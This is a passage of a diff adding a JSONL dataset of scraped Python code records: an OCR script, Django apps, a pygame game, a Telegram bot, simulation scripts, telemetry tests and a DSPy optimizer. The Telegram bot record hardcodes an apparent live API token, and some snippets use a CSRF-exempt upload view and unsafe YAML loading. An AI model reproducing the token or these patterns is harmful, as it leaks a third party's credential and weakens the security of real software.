diff --git "a/1306.jsonl" "b/1306.jsonl" new file mode 100644--- /dev/null +++ "b/1306.jsonl" @@ -0,0 +1,1020 @@ +{"seq_id": "10645953355", "text": "# -*- encoding: utf-8 -*-\n# @Author: SWHL\n# @Contact: liekkaskono@163.com\nimport time\nimport yaml\n\nfrom rapid_videocr import ExtractSubtitle\nfrom rapid_ocr import TextSystem\n\n\ndef read_yaml(yaml_path):\n with open(yaml_path, 'rb') as f:\n data = yaml.load(f, Loader=yaml.Loader)\n return data\n\n\nif __name__ == '__main__':\n ocr_system = TextSystem('config_ocr.yaml')\n\n config = read_yaml('config_videocr.yaml')\n extractor = ExtractSubtitle(ocr_system, **config)\n\n mp4_path = 'assets/test_video/2.mp4'\n time_start = '00:00:00'\n time_end = '-1'\n\n start_time = time.time()\n ocr_result = extractor(mp4_path, time_start, time_end)\n print(ocr_result)\n print(f'elapse: {time.time() - start_time}s')\n", "repo_name": "xinyiZN/RapidVideOCR", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 731, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "yaml.load", "line_number": 13, "usage_type": "call"}, {"api_name": "yaml.Loader", "line_number": 13, "usage_type": "attribute"}, {"api_name": "rapid_ocr.TextSystem", "line_number": 18, "usage_type": "call"}, {"api_name": "rapid_videocr.ExtractSubtitle", "line_number": 21, "usage_type": "call"}, {"api_name": "time.time", "line_number": 27, "usage_type": "call"}, {"api_name": "time.time", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "14020092898", "text": "import os\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtWidgets import QLabel, QFrame\n\n\nclass AddRecordGridLabel(QLabel):\n def __init__(self, name, pixmap, parent=None):\n super().__init__(parent)\n self.name = name\n self.pixmap = pixmap\n self.setPixmap(QPixmap(self.pixmap))\n self.parent = parent\n\n def mouseReleaseEvent(self, event):\n for i in reversed(range(self.parent.gridLayout.count())):\n self.parent.gridLayout.itemAt(i).widget().setFrameStyle(QFrame.NoFrame)\n self.parent.gridLayout.itemAt(i).widget().setStyleSheet(\"border: 2px solid black;\")\n\n self.setStyleSheet(\"border: 4px solid red;\")\n\n self.parent.selectedIcon.setText(self.name)\n\n\n\n\n", "repo_name": "shlomi1074/CommunicationBoard_Prototype", "sub_path": "CustomWidgets/AddRecordGridLabel.py", "file_name": "AddRecordGridLabel.py", "file_ext": "py", "file_size_in_byte": 733, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 6, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 11, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFrame.NoFrame", "line_number": 16, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QFrame", "line_number": 16, "usage_type": "name"}]} +{"seq_id": "28146988540", "text": "\n\nimport logging\nfrom aiogram import Bot, Dispatcher, executor, types\nfrom googletrans import Translator, constantsz\n\ntranslator = Translator()\n\nAPI_TOKEN = '5055886499:AAGobKzugq0q9pDXCTN5nF01OJ6mPWc5oH8'\n\nlogging.basicConfig(level=logging.INFO)\n\nbot = Bot(token=API_TOKEN)\ndp = Dispatcher(bot)\n\n@dp.message_handler(commands=['start', 'help'])\nasync def send_welcome(message: types.Message):\n await message.reply(\"Hi!\\n I'm translator bot!\\n You can use me to translate your projects! 
\\n I'm powered by Python and Django Developer BoyMirzo!\")\n\n@dp.message_handler()\nasync def echo(message: types.Message):\n translation = translator.translate(message.text, dest=\"\")\n await message.answer(translation.text)\nif __name__ == '__main__':\n executor.start_polling(dp, skip_updates=True)", "repo_name": "Khumoyunm1rzo01/Back-end_New", "sub_path": "Telegram_bot.py", "file_name": "Telegram_bot.py", "file_ext": "py", "file_size_in_byte": 791, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "googletrans.Translator", "line_number": 7, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 11, "usage_type": "attribute"}, {"api_name": "aiogram.Bot", "line_number": 13, "usage_type": "call"}, {"api_name": "aiogram.Dispatcher", "line_number": 14, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 17, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 17, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 21, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 21, "usage_type": "name"}, {"api_name": "aiogram.executor.start_polling", "line_number": 25, "usage_type": "call"}, {"api_name": "aiogram.executor", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "31488474167", "text": "from django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render, redirect\nfrom .forms import *\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .predict_model import *\n \n# Create your views here.\n@csrf_exempt\ndef index(request):\n if request.method == 'POST':\n form = UploadModelForm(request.POST, request.FILES)\n \n if form.is_valid():\n form.save()\n fileName = request.POST.get(\"fileName\")\n # ETT預測\n ETT_result_1,ETT_result_2,ETT_result_3,ETT_result_4,ettImg =define_dataset(fileName)\n resultImg = ensemble_ett(ETT_result_1,ETT_result_2,ETT_result_3,ETT_result_4)\n ETT_PrintPoint(resultImg,ettImg,fileName)\n\n #return redirect('success')\n return render(request, 'index.html',{'form' : form} ) \n else:\n form = UploadModelForm()\n return render(request, 'index.html',{'form' : form} ) \n \n \ndef success(request):\n return HttpResponse('successfully uploaded')", "repo_name": "ab3223323/ETT_System", "sub_path": "ett/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1015, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.shortcuts.render", "line_number": 22, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 25, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 8, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "43230716906", "text": "from django.test import TestCase\nfrom django.urls import reverse\n\nfrom rest_framework.response import Response\n\nfrom main.models import Category, Product\n\n\nclass APITest(TestCase):\n def setUp(self) -> None:\n Category.objects.create(name='cat 1')\n Product.objects.create(\n name='test_name',\n SKU='1234',\n category=Category.objects.get(id=1),\n price=100,\n descr='str descr',\n short_descr='str short_descr'\n )\n self.product_as_response = 
b'[{\"id\":1,\"name\":\"test_name\",\"SKU\":\"1234\",\"price\":100,\"descr\":\"str descr\",\"short_descr\":\"str short_descr\",\"category\":1}]'\n return super().setUp()\n \n def test_product_api_view(self):\n res = self.client.get(reverse('api:product')) \n self.assertEqual(\n self.product_as_response,\n res.content)\n\n def test_product_filter(self):\n self.assertEqual(self.product_as_response, \n self.client.get(reverse('api:product'),{'id' : 1}).content)\n self.assertEqual(self.product_as_response, \n self.client.get(reverse('api:product'),{'category' : 1}).content)\n self.assertEqual(self.product_as_response, \n self.client.get(reverse('api:product'),{'name' : 'test_name'}).content)\n \n def test_create_product(self):\n self.assertEqual(\n b'{\"id\":2,\"name\":\"test_name\",\"SKU\":\"1234\",\"price\":100,\"descr\":\"str descr\",\"short_descr\":\"str short_descr\",\"category\":1}', \n self.client.post(reverse('api:product'),{\n 'name':'test_name',\n 'SKU':'1234',\n 'category':1,\n 'price':100,\n 'descr':'str descr',\n 'short_descr':'str short_descr'\n }).content)\n \n def test_product_detail(self):\n self.assertEqual(b'{\"id\":1,\"name\":\"test_name\",\"SKU\":\"1234\",\"price\":100,\"descr\":\"str descr\",\"short_descr\":\"str short_descr\",\"category\":1}', \n self.client.get(reverse('api:prod_detail', kwargs={'pk':1})).content)\n\n\n", "repo_name": "DenysDanov/Emmet-Brown-Warehouse", "sub_path": "shop/shop/apps/api/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 2257, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.test.TestCase", "line_number": 9, "usage_type": "name"}, {"api_name": "main.models.Category.objects.create", "line_number": 11, "usage_type": "call"}, {"api_name": "main.models.Category.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "main.models.Category", "line_number": 11, "usage_type": "name"}, {"api_name": "main.models.Product.objects.create", "line_number": 12, "usage_type": "call"}, {"api_name": "main.models.Product.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "main.models.Product", "line_number": 12, "usage_type": "name"}, {"api_name": "main.models.Category.objects.get", "line_number": 15, "usage_type": "call"}, {"api_name": "main.models.Category.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "main.models.Category", "line_number": 15, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 24, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 31, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 33, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 35, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 40, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "35701014163", "text": "from django.contrib import admin\nfrom django.urls import path\nfrom AppCoder.views import mostrar_agregarprofesora, mostrar_formulario, mostrar_inicio, mostrar_contacto, mostrar_sobrenosotros, mostrar_agregarubicacion, mostrar_formulario_2, mostrar_busqueda, buscar\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('inicio/', mostrar_inicio, name=\"inicio\"),\n path('contacto/', mostrar_contacto, name=\"contacto\"),\n path('sobrenosotros/', mostrar_sobrenosotros, name=\"sobrenosotros\"),\n path('formulario/', 
mostrar_formulario, name=\"formulario\"),\n path('agregarprofesora/', mostrar_agregarprofesora, name=\"agregarprofesora\"),\n path('agregarubicacion/', mostrar_agregarubicacion, name=\"agregarubicacion\"),\n path('formulario2/', mostrar_formulario_2, name=\"formulario2\"),\n path('busqueda/', mostrar_busqueda, name=\"busqueda\"),\n path('buscar/', buscar),\n \n]", "repo_name": "nachocaceres/python", "sub_path": "AppCoder/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 891, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 6, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "AppCoder.views.mostrar_inicio", "line_number": 7, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "AppCoder.views.mostrar_contacto", "line_number": 8, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "AppCoder.views.mostrar_sobrenosotros", "line_number": 9, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "AppCoder.views.mostrar_formulario", "line_number": 10, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "AppCoder.views.mostrar_agregarprofesora", "line_number": 11, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "AppCoder.views.mostrar_agregarubicacion", "line_number": 12, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "AppCoder.views.mostrar_formulario_2", "line_number": 13, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "AppCoder.views.mostrar_busqueda", "line_number": 14, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "AppCoder.views.buscar", "line_number": 15, "usage_type": "argument"}]} +{"seq_id": "33900806897", "text": "#!/usr/bin/env python3\n\nimport pygame\n# 导入pygame库\n\nfrom sys import exit\n# 向sys模块借一个exit函数用来退出程序\nfrom os import path\n\n# 生成随机数\nimport random\n\n\n# 设置图片目录\nmain_path = path.dirname(__file__)\nassets_folder = path.join(main_path, 'data')\n\nprint(assets_folder)\n\n# 初始化pygame,为使用硬件做准备\npygame.init()\n\n# 创建了一个窗口\nscreen = pygame.display.set_mode((1300, 876), 0, 32)\n\n# 设置窗口标题\npygame.display.set_caption(\"Catch me if you can\")\n\n# 导入背景图\nbg_img = path.join(assets_folder, 'cat_bg.jpg')\nbackground = pygame.image.load(bg_img).convert()\n\n\ndef rand_cats(cat_list):\n \"\"\" 随机得到一只猫\"\"\"\n i = random.randint(0, len(cat_list) - 1)\n cat_img = path.join(assets_folder, cat_list[i])\n cat = pygame.image.load(cat_img).convert_alpha()\n return cat\n\n\n# 讲话用的字体\nfont_name = pygame.font.SysFont('comicsansms', 72)\n\ntext = font_name.render('Meow~', True, (0, 128, 0))\n\n\n# 就这么几只猫\ncats = ['fun_cat1.jpg', 'fun_cat2.jpg',\n 'fun_cat3.jpg', 'fun_cat4.jpg', 'fun_cat5.jpg']\n\n# 将背景图画上去\nscreen.blit(background, (0, 0))\nmouse_cursor = rand_cats(cats)\nscreen.blit(mouse_cursor, (random.randint(0, 1000), 
random.randint(0, 700)))\n\nwhile True:\n \"\"\" 游戏主循环\"\"\"\n\n pygame.display.update()\n\n # 等待输入\n event = pygame.event.wait()\n if event.type == pygame.QUIT:\n # 接收到退出事件后退出程序\n exit()\n elif event.type == pygame.MOUSEBUTTONUP:\n # 获得鼠标位置\n x, y = pygame.mouse.get_pos()\n # 准备下一个猫\n mouse_cursor = rand_cats(cats)\n\n # 获取猫头的尺寸\n width = mouse_cursor.get_width()\n height = mouse_cursor.get_height()\n\n # 获得新的随机位置\n if x < 650:\n x = random.randint(650, 1300 - width)\n y = random.randint(0, 876 - height)\n else:\n x = random.randint(0, 650 - width)\n y = random.randint(0, 876 - height)\n\n # 画新猫\n screen.blit(background, (0, 0))\n screen.blit(mouse_cursor, (x, y))\n screen.blit(text, (x, y))\n\n else:\n pass\n", "repo_name": "nilingh/pygame_ex", "sub_path": "hello wild.py", "file_name": "hello wild.py", "file_ext": "py", "file_size_in_byte": 2206, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "name"}, {"api_name": "pygame.init", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 27, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "name"}, {"api_name": "pygame.image.load", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 31, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "name"}, {"api_name": "pygame.image.load", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 43, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 55, "usage_type": "call"}, {"api_name": "pygame.display.update", "line_number": 60, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pygame.event.wait", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 64, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 66, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONUP", "line_number": 67, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 69, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 69, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 79, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 80, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 82, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "37157729866", "text": "import 
time\nfrom selenium import webdriver\n\ndef getInfo():\n driver = webdriver.Firefox()\n driver.get('http://music.163.com/#/discover/toplist?id=3778678', timeout = 120)\n driver.implicitly_wait(5)\n songs = driver.find_element_by_xpath('//div[@class=\"ttc\"]/span/a/b')\n song_links = driver.find_element_by_xpath('//div[@class = \"ttc\"]/span/a')\n print(songs)\n print(song_links)\n for song, song_link in zip(songs, song_links):\n print(f'{song:<10}{\"https://music.163.com/#\"+song_link:<}')\n driver.quit()\n\ngetInfo()\n", "repo_name": "0Jvang/my-python-career", "sub_path": "网络爬虫/selenium/selenium爬网易云音乐.py", "file_name": "selenium爬网易云音乐.py", "file_ext": "py", "file_size_in_byte": 544, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "selenium.webdriver.Firefox", "line_number": 5, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 5, "usage_type": "name"}]} +{"seq_id": "74479829604", "text": "# Import the rebound module\nimport rebound\nimport os\n\n\ndef replace_snapshot(sim, filename):\n if os.path.isfile(filename):\n os.remove(filename)\n sim.simulationarchive_snapshot(filename)\n\n\ndiv = 100\n\nfilename = \"simulationarchive.bin\"\ntmax = 1 * 3.1415 * 1e5\n\ntry:\n sim = rebound.Simulation.from_archive(filename)\n sim.automateSimulationArchive(filename, interval=tmax / div)\n print(\"Restarting from simulation archive. Last snapshot found at t=%.1f\" % sim.t)\nexcept:\n print(\"Cannot load SimulationArchive. Creating new simulation.\")\n\n sim = rebound.Simulation()\n sim.integrator = 'whfast'\n sim.G = 1\n sim.ri_whfast.safe_mode = 0\n\n sim.collision = 'line'\n # sim.collision_resolve = collision\n\n sim.add(m=1) # star\n r = 0.0001\n sim.add(m=1e-3, P=1, e=0.1, r=r) # planet 1\n sim.add(m=1e-3, P=1.3, e=0.1, r=r) # planet 2\n sim.dt = 3.1415 * 2. * 6. 
/ 365.25 # 6 days in units where G=1\n sim.move_to_com()\n # sim.automateSimulationArchive(filename, interval=tmax/1000, deletefile=True)\n sim.automateSimulationArchive(filename, interval=tmax / div)\n\n\ntry:\n sim.integrate(tmax)\nexcept rebound.Collision:\n replace_snapshot(sim, \"final_collide.bin\")\n\nsa = rebound.SimulationArchive(filename)\nprint(sa[-2].t)\nprint(sa[-1].t)\nprint(sa[-1].t - sa[-2].t)\nprint(tmax / div)\nprint(sim.dt)\nprint(len(sa))\n\nreplace_snapshot(sim, \"final.bin\")\n", "repo_name": "christiangil/ML-Stability", "sub_path": "new_sim_archive_test.py", "file_name": "new_sim_archive_test.py", "file_ext": "py", "file_size_in_byte": 1400, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.isfile", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 8, "usage_type": "call"}, {"api_name": "rebound.Simulation.from_archive", "line_number": 18, "usage_type": "call"}, {"api_name": "rebound.Simulation", "line_number": 18, "usage_type": "attribute"}, {"api_name": "rebound.Simulation", "line_number": 24, "usage_type": "call"}, {"api_name": "rebound.Collision", "line_number": 44, "usage_type": "attribute"}, {"api_name": "rebound.SimulationArchive", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "20502064847", "text": "import numpy as np\nfrom MoneyModel import MoneyModel\nfrom mesa.visualization.ModularVisualization import (ModularServer,\n VisualizationElement)\nfrom mesa.visualization.modules import ChartModule\n\nclass HistogramModule(VisualizationElement):\n\n package_includes = [\"Chart.min.js\"]\n local_includes = [\"HistogramModule.js\"]\n canvas_height = 200\n canvas_width = 500\n\n def __init__(self, bins, canvas_height, canvas_width):\n self.canvas_height = canvas_height\n self.canvas_width = canvas_width\n self.bins = bins\n new_element = \"new HistogramModule({}, {}, {})\"\n new_element = new_element.format(bins, canvas_width, canvas_height)\n self.js_code = \"elements.push(\" + new_element + \");\"\n\n def render(self, model):\n wealth_vals = [agent.wealth for agent in model.schedule.agents]\n hist = np.histogram(wealth_vals, bins=self.bins)[0]\n\n return [int(x) for x in hist]\n\nchart_element = ChartModule([{\"Label\": \"Gini\", \"Color\": \"Black\"}], \n data_collector_name='dc')\n\nhistogram_element = HistogramModule(list(range(10)), 200, 500)\nserver = ModularServer(MoneyModel, [histogram_element], \"MoneyModel\", 100)\n#server = ModularServer(MoneyModel, [chart_element], \"Money Model\", 100)\nserver.launch()", "repo_name": "scipy-conference/scipy_proceedings_2015", "sub_path": "papers/jacqueline_kazil/MoneyModel_Visualization.py", "file_name": "MoneyModel_Visualization.py", "file_ext": "py", "file_size_in_byte": 1337, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "52", "api": [{"api_name": "mesa.visualization.ModularVisualization.VisualizationElement", "line_number": 7, "usage_type": "name"}, {"api_name": "numpy.histogram", "line_number": 24, "usage_type": "call"}, {"api_name": "mesa.visualization.modules.ChartModule", "line_number": 28, "usage_type": "call"}, {"api_name": "mesa.visualization.ModularVisualization.ModularServer", "line_number": 32, "usage_type": "call"}, {"api_name": "MoneyModel.MoneyModel", "line_number": 32, "usage_type": "argument"}]} +{"seq_id": "12508886045", "text": "import 
mock\nimport tempfile\nimport unittest\n\nfrom telemetry.internal.forwarders import cros_forwarder\nfrom telemetry import decorators\n\n\nclass CrOsSshForwarderTests(unittest.TestCase):\n def setUp(self):\n self._Patch('subprocess') # Do not actually run subprocesses.\n self._Patch('tempfile') # Do not actually create tempfiles.\n self.ReadRemotePort = self._Patch('_ReadRemotePort')\n self.GetUnreservedAvailableLocalPort = self._Patch(\n 'util.GetUnreservedAvailableLocalPort')\n self.cri = mock.Mock()\n\n def _Patch(self, target):\n patcher = mock.patch(\n 'telemetry.internal.forwarders.cros_forwarder.' + target)\n self.addCleanup(patcher.stop)\n return patcher.start()\n\n def testForwarderBasic(self):\n f = cros_forwarder.CrOsSshForwarder(\n self.cri, local_port=111, remote_port=222, port_forward=True)\n self.cri.FormSSHCommandLine.assert_called_once_with(\n ['-NT'], ['-R222:127.0.0.1:111'], port_forward=True)\n self.assertEqual(f.local_port, 111)\n self.assertEqual(f.remote_port, 222)\n\n def testForwarderBasicReverse(self):\n f = cros_forwarder.CrOsSshForwarder(\n self.cri, local_port=111, remote_port=222, port_forward=False)\n self.cri.FormSSHCommandLine.assert_called_once_with(\n ['-NT'], ['-L111:127.0.0.1:222'], port_forward=False)\n self.assertEqual(f.local_port, 111)\n self.assertEqual(f.remote_port, 222)\n\n def testForwarderDefaultRemote(self):\n self.ReadRemotePort.return_value = 444\n f = cros_forwarder.CrOsSshForwarder(\n self.cri, local_port=111, remote_port=None, port_forward=True)\n self.cri.FormSSHCommandLine.assert_called_once_with(\n ['-NT'], ['-R0:127.0.0.1:111'], port_forward=True)\n self.assertEqual(f.local_port, 111)\n self.assertEqual(f.remote_port, 444)\n\n def testForwarderReverseDefaultLocal(self):\n self.GetUnreservedAvailableLocalPort.return_value = 777\n f = cros_forwarder.CrOsSshForwarder(\n self.cri, local_port=None, remote_port=222, port_forward=False)\n self.cri.FormSSHCommandLine.assert_called_once_with(\n ['-NT'], ['-L777:127.0.0.1:222'], port_forward=False)\n self.assertEqual(f.local_port, 777)\n self.assertEqual(f.remote_port, 222)\n\n\nclass ReadRemotePortTests(unittest.TestCase):\n @decorators.Disabled('win') # https://crbug.com/793256\n def testReadRemotePort(self):\n sample_output = [\n '', '', 'Allocated port 42360 for remote forward to localhost:12345']\n\n with tempfile.NamedTemporaryFile() as cros_stderr:\n for line in sample_output:\n cros_stderr.write(line + '\\n')\n cros_stderr.flush()\n remote_port = cros_forwarder._ReadRemotePort(cros_stderr.name)\n\n self.assertEqual(remote_port, 42360)\n", "repo_name": "kiwibrowser/src", "sub_path": "third_party/catapult/telemetry/telemetry/internal/forwarders/cros_forwarder_unittest.py", "file_name": "cros_forwarder_unittest.py", "file_ext": "py", "file_size_in_byte": 2717, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2475, "dataset": "github-code", "pt": "52", "api": [{"api_name": "unittest.TestCase", "line_number": 9, "usage_type": "attribute"}, {"api_name": "mock.Mock", "line_number": 16, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 19, "usage_type": "call"}, {"api_name": "telemetry.internal.forwarders.cros_forwarder.CrOsSshForwarder", "line_number": 25, "usage_type": "call"}, {"api_name": "telemetry.internal.forwarders.cros_forwarder", "line_number": 25, "usage_type": "name"}, {"api_name": "telemetry.internal.forwarders.cros_forwarder.CrOsSshForwarder", "line_number": 33, "usage_type": "call"}, {"api_name": "telemetry.internal.forwarders.cros_forwarder", 
"line_number": 33, "usage_type": "name"}, {"api_name": "telemetry.internal.forwarders.cros_forwarder.CrOsSshForwarder", "line_number": 42, "usage_type": "call"}, {"api_name": "telemetry.internal.forwarders.cros_forwarder", "line_number": 42, "usage_type": "name"}, {"api_name": "telemetry.internal.forwarders.cros_forwarder.CrOsSshForwarder", "line_number": 51, "usage_type": "call"}, {"api_name": "telemetry.internal.forwarders.cros_forwarder", "line_number": 51, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 59, "usage_type": "attribute"}, {"api_name": "tempfile.NamedTemporaryFile", "line_number": 65, "usage_type": "call"}, {"api_name": "telemetry.internal.forwarders.cros_forwarder._ReadRemotePort", "line_number": 69, "usage_type": "call"}, {"api_name": "telemetry.internal.forwarders.cros_forwarder", "line_number": 69, "usage_type": "name"}, {"api_name": "telemetry.decorators.Disabled", "line_number": 60, "usage_type": "call"}, {"api_name": "telemetry.decorators", "line_number": 60, "usage_type": "name"}]} +{"seq_id": "31188011838", "text": "import dsp\nimport tqdm\nimport random\n\nfrom .bootstrap import BootstrapFewShot\nfrom .vanilla import LabeledFewShot\n\nfrom dspy.evaluate.evaluate import Evaluate\n\n\n# TODO: Don't forget dealing with the raw demos.\n# TODO: Deal with the (pretty common) case of having a metric for filtering and a metric for eval\n\n# TODO: There's an extremely strong case (> 90%) to switch this to NOT inherit from BootstrapFewShot.\n# Instead, it should wrap it: during compilation just loop, create a copy to compile, shuffle the full/sampled\n# trainset and compile with that. This will also make it easier to use raw demos.\n# Once all versions exist, define the validation set and evaluate.\n\n# TODO: This function should take a max_budget and max_teacher_budget. That's in the number of program calls.\n# In this case, max_student_budget is max_budget - max_teacher_budget.\n# For max_teacher_budget, this will just limit the total number of things we bootstrap.\n# This can end up implicitly defining the number of candidate programs (i.e., stop when runs out). Cap at 16.\n# For max_student_budget, this will be a more upfront calculation.\n# Right now, it can also just induce the number of candidate programs. Later, it could be used more interestingly\n# for selective early stopping.\n# Progressive elimination sounds about right: after 50 examples, drop bottom third, after 100, another third, etc.\n# until only 3--5 are left for the end. Could also be systematic and add (earlier) stopping based on error bounds.\n# In general, though, the early filtering is just saying: either there are some really bad ones, or some really really\n# good ones, or most things are pretty close. 
In all of these cases, dropping the bottom third is not going to hurt.\n\n# Also, this function should be efficient in the following way:\n# seed -3, seed -2, and seed -1 so to speak should just be \"zero shot\", \"labeled shots\", and \"bootstrap\" without any tweaks.\n\n\nclass BootstrapFewShotWithRandomSearch(BootstrapFewShot):\n def __init__(self, metric, teacher_settings={}, max_bootstrapped_demos=4, max_labeled_demos=16, max_rounds=1, num_candidate_programs=16, num_threads=6):\n self.metric = metric\n self.teacher_settings = teacher_settings\n self.max_rounds = max_rounds\n\n self.num_threads = num_threads\n\n self.min_num_samples = 1\n self.max_num_samples = max_bootstrapped_demos\n self.num_candidate_sets = num_candidate_programs\n self.max_num_traces = 1 + int(max_bootstrapped_demos / 2.0 * self.num_candidate_sets)\n\n # Semi-hacky way to get the parent class's _boostrap function to stop early.\n self.max_bootstrapped_demos = self.max_num_traces\n self.max_labeled_demos = max_labeled_demos\n\n print(\"Going to sample between\", self.min_num_samples, \"and\", self.max_num_samples, \"traces per predictor.\")\n print(\"Going to sample\", self.max_num_traces, \"traces in total.\")\n print(\"Will attempt to train\", self.num_candidate_sets, \"candidate sets.\")\n\n # self.num_candidate_sets = 1\n\n # import time\n # time.sleep(10)\n\n def _random_search_instance(self, idx):\n print(\"Random search instance\", idx)\n\n rng = random.Random(idx)\n program = self.student.deepcopy()\n\n for predictor in program.predictors():\n sample_size = rng.randint(self.min_num_samples, self.max_num_samples)\n print(f\"[{idx}] \\t Sampling {sample_size} traces from {len(predictor.traces)} traces.\")\n\n augmented_demos = rng.sample(predictor.traces, min(sample_size, len(predictor.traces)))\n\n # TODO: FIXME: Figuring out the raw demos here is a bit tricky. 
